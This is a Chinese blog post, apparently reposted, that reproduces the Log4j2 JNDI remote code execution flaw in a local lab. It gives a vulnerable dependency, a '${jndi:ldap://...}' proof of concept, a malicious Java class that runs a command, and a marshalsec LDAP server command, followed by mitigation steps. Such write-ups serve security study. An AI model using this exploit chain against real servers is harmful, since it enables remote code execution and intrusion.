别中招!手把手教你复现 Log4j2 漏洞

最新推荐文章于 2024-08-14 11:39:49 发布
最新推荐文章于 2024-08-14 11:39:49 发布
阅读量287 收藏
点赞数
文章标签: 中间件 java maven spring spring boot
原文链接:https://mp.weixin.qq.com/s?__biz=Mzg2MjEwMjI1Mg==&mid=2247526894&idx=1&sn=3f8607d952fa5a434b0ad4817552c709&chksm=ce0ede6df979577b18521c7b9eabddd6629fdee9a6338e400574be0b2848e866f9d22dec852d&scene=126&&sessionid=0
版权

1. 简介

ApacheLog4j2是一个开源的Java日志框架,被广泛地应用在中间件、开发框架与Web应用中。

2. 漏洞概述  

该漏洞是由于Apache Log4j2某些功能存在递归解析功能,未经身份验证的攻击者通过发送特定恶意数据包,可在目标服务器上执行任意代码。

3. 影响范围

Apache Log4j 2.x <= 2.15.0-rc1

4. 环境搭建

1、创建一个新的maven项目,并导入Log4j的依赖包

<dependency>
    <groupId>org.apache.logging.log4j</groupId>
    <artifactId>log4j-core</artifactId>
    <version>2.14.1</version>
</dependency>

597a7d7870e38b2e8f6e5a0ce887d97e.png

漏洞利用

1、使用POC测试

import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;
class LogTest {
    public static final Logger logger = LogManager.getLogger();
    public static void main(String[] args) {
        logger.error("${jndi:ldap://localhost:8888/Exploit}");
    }
}

2、编译一恶意类Exploit.class

首先新建exp.java,然后编译为class文件

class Exploit {
    static {
        System.err.println("Pwned");
        try {
            String cmds = "calc";
            Runtime.getRuntime().exec(cmds);
        } catch ( Exception e ) {
            e.printStackTrace();
        }
    }
}
javac exp.java

bf1f6cb0211075b48614f0cf23813a86.png

3、使用marshalsec-0.0.3-SNAPSHOT-all.jar本地开启一个LDAP服务

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer
"http://127.0.0.1:7777/#Exploit" 8888

2427ed23d128a6960ae12d55f5e5132d.png

4、运行poc.java,即可访问恶意类并执行写在其中的"calc"命令

80c5d3eca11065f904d00ee52da30813.png

结合一些其它 StrLookup 适当变形,以及配合官方测试用例中脏数据`"?Type=A Type&Name=1100110&Char=!"`可绕过rc1,RC2版本对此异常进行了捕获。

https://github.com/apache/logging-log4j2/compare/log4j-2.15.0-rc1...log4j-2.15.0-rc2

5594196842d682b20414e7b462c2c9b6.png

 5. 修复方 

目前,Apache官方已发布新版本完成漏洞修复,建议用户尽快进行自查,并及时升级至最新版本:

https://github.com/apache/logging-log4j2/releases/tag/log4j-2.15.0-rc2

建议同时采用如下临时措施进行漏洞防范:

1)添加jvm启动参数-Dlog4j2.formatMsgNoLookups=true;

2)在应用classpath下添加log4j2.component.properties配置文件,文件内容为log4j2.formatMsgNoLookups=true;

3)JDK使用11.0.1、8u191、7u201、6u211及以上的高版本;

4)部署使用第三方防火墙产品进行安全防护。

【END】

如果看到这里,说明你喜欢这篇文章,请转发、点赞。微信搜索「web_resource」,关注后回复「进群」或者扫描下方二维码即可进入无广告交流群。

↓扫描二维码进群↓

a478e85f93aa6834c0f078982d5a8bff.png

公众号:Java后端
关注
java 反序列化利用工具marshalsec-0.0.3-SNAPSHOT-all
12-27
marshalsec命令格式如下: java -cp target/marshalsec-0.0.1-SNAPSHOT-all.jar marshalsec.<Marshaller> [-a] [-v] [-t] [<gadget_type> [<arguments...>]] 参数说明: -a:生成exploit下的所有payload(例如:hessian下的SpringPartiallyComparableAdvisorHolder, SpringAbstractBeanFactoryPointcutAdvisor, Rome, XBean, Resin) -t:对生成的payloads进行解码测试 -v:verbose mode, 展示生成的payloads gadget_type:指定使用的payload arguments - payload运行时使用的参数 marshalsec.<marshaller>:指定exploits,根目录下的java文件名
Log4j2漏洞复现(CVE-2021-44228)
qq_43798640的博客
12-15 3万+
Apache Log4j是一个基于Java的日志记录组件,通过重写Log4j引入了丰富的功能特性,该日志组件被广泛应用于业务系统开发,用以记录程序输入输出日志信息。Apache Log4j2存在远程代码执行漏洞,攻击者可利用该漏洞向目标服务器发送精心构造的恶意数据,触发Log4j2组件解析缺陷,实现目标服务器的任意代码执行,获得目标服务器权限。影响范围:Apache Log4j 2.x<=2.14.1。已知受影响的应用及组件,如 spring-boot-strater-log4...
log4j2远程代码执行漏洞原理与漏洞复现(基于vulhub,保姆级的详细程)_log4j漏洞复现
最新发布
heike_Ch的博客
08-14 1220
log4j2是2021年底爆出的非常严重的漏洞,可谓是风靡一时,“血洗互联网”,也是安全公司面试的常见题目,我们应该了解这个漏洞的原理及利用方式。如何排查是否受到了攻击?检查日志中是否存在"jndi:ldap://"、"jndi:rmi//"等字符来发现可能的攻击行为,前面复现的过程在payload的构造中都出现了这样的字符串,这是攻击的典型标志。如何对log4j2的攻击进行防御?1.设置log4j2.formatMsgNoLookups=True。
log4j2漏洞复现
weixin_51681694的博客
05-10 883
apache log4j通过定义每一条日志信息的级别能够更加细致地控制日志生成地过程,受影响地版本中纯在JNDI注入漏洞,导致日志在记录用户输入地数据时,触发了注入漏洞,该漏洞可导致远程代码执行,且利用条件低,影响范围广,小到网站,大到可联网的车都受影响,建议使用了相关版本的应用或者插件,尽快升级修补,做好相关方措施,避免造成不必要的损失受影响的组件。
Log4j2漏洞复现
weixin_51519028的博客
08-12 1万+
Apache Log4j2是 Apache软件基金会下的一个开源的基于 Java 的日志记录工具。Log4j2 是一个 Log4j 1.x 的重写,并且引入了大量丰富的特性。该日志框架被大量用于业务系统开发,用来记录日志信息。由于其优异的性能而被广泛的应用于各种常见的 Web 服务中。2021 年 12 月 9 日晚,Log4j2 的一个远程代码执行漏洞的利用细节被公开。攻击者使用${}......
log4j2漏洞复现与利用】
热门推荐
一个程序员
01-31 4万+
log4j2
电子工程师常犯错误大全,看看你有没有中招
07-18
是人就会犯错,何况是工程师呢?虽然斗转星移,工程师们却经常犯同样的错误!下面,就请各位对号入座,看看自己有没有中招
电脑中招不要怕你几招查杀病毒5个技巧
05-11
### 电脑中招不要怕:你几招查杀病毒的五个实用技巧 在日常使用电脑的过程中,我们难免会遇到各种安全问题,其中最让人头疼的莫过于电脑被病毒侵扰了。一旦电脑中招,轻则运行速度变慢、频繁弹出广告窗口;重则...
河南省郑州市第四中学2013届中考英语中招模拟试题 人新目标版
08-19
此资源是一份针对河南省郑州市第四中学2013届毕业生的中考英语中招模拟试题,基于人新目标版材。这份试题主要测试学生的听力理解和单项选择能力,是备考英语中考的重要练习材料。 1. **听力理解**: - 听力...
最新签加盟奶茶店合同需要注意什么签合同要注意的“小细节”,以后别再中招了!DOC版式文档.docx
09-12
2. **法律效力**:根据《劳动合同法》,用人单位未在规定时间内与劳动者签订合同,需支付二倍工资。即使工资和社保正常发放,未签合同依然会产生法律风险。劳动者拒签或因意外原因未签合同,用人单位仍需承担责任。 ...
【网络安全---漏洞复现log4j2漏洞详细的复现和利用过程(CVE-2021-44228)
m0_67844671的博客
09-10 3054
Log4j2远程代码执行漏洞复现(cve-2021-44228),漏洞复现详细过程,cve-2021-44228,Log4j2
log4j2原理分析及漏洞复现
HUANGXIN9898的博客
10-23 911
Apache Log4j2是一个基于Java的日志记录工具,当前被广泛应用于业务系统开发,开发者可以利用该工具将程序的输入输出信息进行日志记录。2021年11月24日,阿里云安全团队向Apache官方报告了Apache Log4j2远程代码执行漏洞。该漏洞是由于Apache Log4j2某些功能存在递归解析功能,导致攻击者可直接构造恶意请求,触发远程代码执行漏洞,从而获得目标服务器权限。在java中最常用的日志框架是log4j2和logback,其中log4j2支持。
Log4j2 反序列化漏洞原理与复现
FisrtBqy的博客
05-15 4473
Log4j2 RCE漏洞原理与复现
Apache Log4j2漏洞 (CVE-2021-44228) 分析与复现
未完成的歌~的博客
03-15 1万+
Apache Log4j2 是一个开源的 Java 日志记录工具。Log4j2 是 Log4j 的升级版本,其优异的性能被广泛的应用于各种常见的 Web 服务中。Log4j2 在特定的版本中由于启用了 lookup 功能,导致存在 JNDI 漏洞。lookup 函数是用于在日志消息中替换变量的函数,是通过配置文件中的${}语法调用的,例如:如果在日志消息中使用了,那么 log4j2 将使用 lookup 函数从系统属性中查找名为 “my.property” 的属性值,并将其替换为实际值。
Log4j2漏洞修复
derstsea的专栏
12-14 1万+
一、漏洞说明 Apache Log4j2是一个基于Java的日志记录工具。由于Apache Log4j2某些功能存在递归解析功能,攻击者可直接构造恶意请求,触发远程代码执行漏洞漏洞利用无需特殊配置,经阿里云安全团队验证,Apache Struts2、Apache Solr、Apache Druid、Apache Flink等均受影响。 漏洞适用版本为 2.0 <= Apache log4j2 <= 2.14.1,只需检测Java应用是否引入 log4j-api , log4j-core 两个j
Apache Log4j2(CVE-2021-4101)远程代码执行漏洞复现
今天是几号的博客
04-12 3017
Apache log4j是Apache的一个开源项目,Java的日志记录工具(同logback)。log4j2中存在JNDI注入漏洞,当程序记录用户输入的数据时,即可触发该漏洞。 影响范围 Apache Log4j 2.x
log4j2漏洞复现以及解决方案
学习不止境的博客
08-10 4513
log4j2漏洞解决 rmi远程调用 jndi注入 lookup
log4j2漏洞复现(CVE-2021-44228)
weixin_45585955的博客
05-11 7506
一、原理介绍 由于Log4j2组件在处理程序日志记录时存在JNDI注入缺陷,未经授权的攻击者利用该漏洞,可向目标服务器发送精心构造的恶意数据,触发Log4j2组件解析缺陷,实现目标服务器的任意代码执行,获得目标服务器权限。 二、vulfocus靶场安装 docker pull vulfocus/vulfocus:latest docker run -d -p 80:80 -v /var/run/docker.sock:/var/run/docker.sock -e VUL_IP=192.16..
SSL漏洞CVE-2016-2183漏洞复现
06-29
4. **分析响应**:服务器如果中招,它会使用FREAK攻击所依赖的弱密钥参数。你可能需要查看加密后的通信数据,使用特定工具(如Wireshark)解码并分析这些参数。 5. **验证结果**:如果你成功地从服务器的响应中提取...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值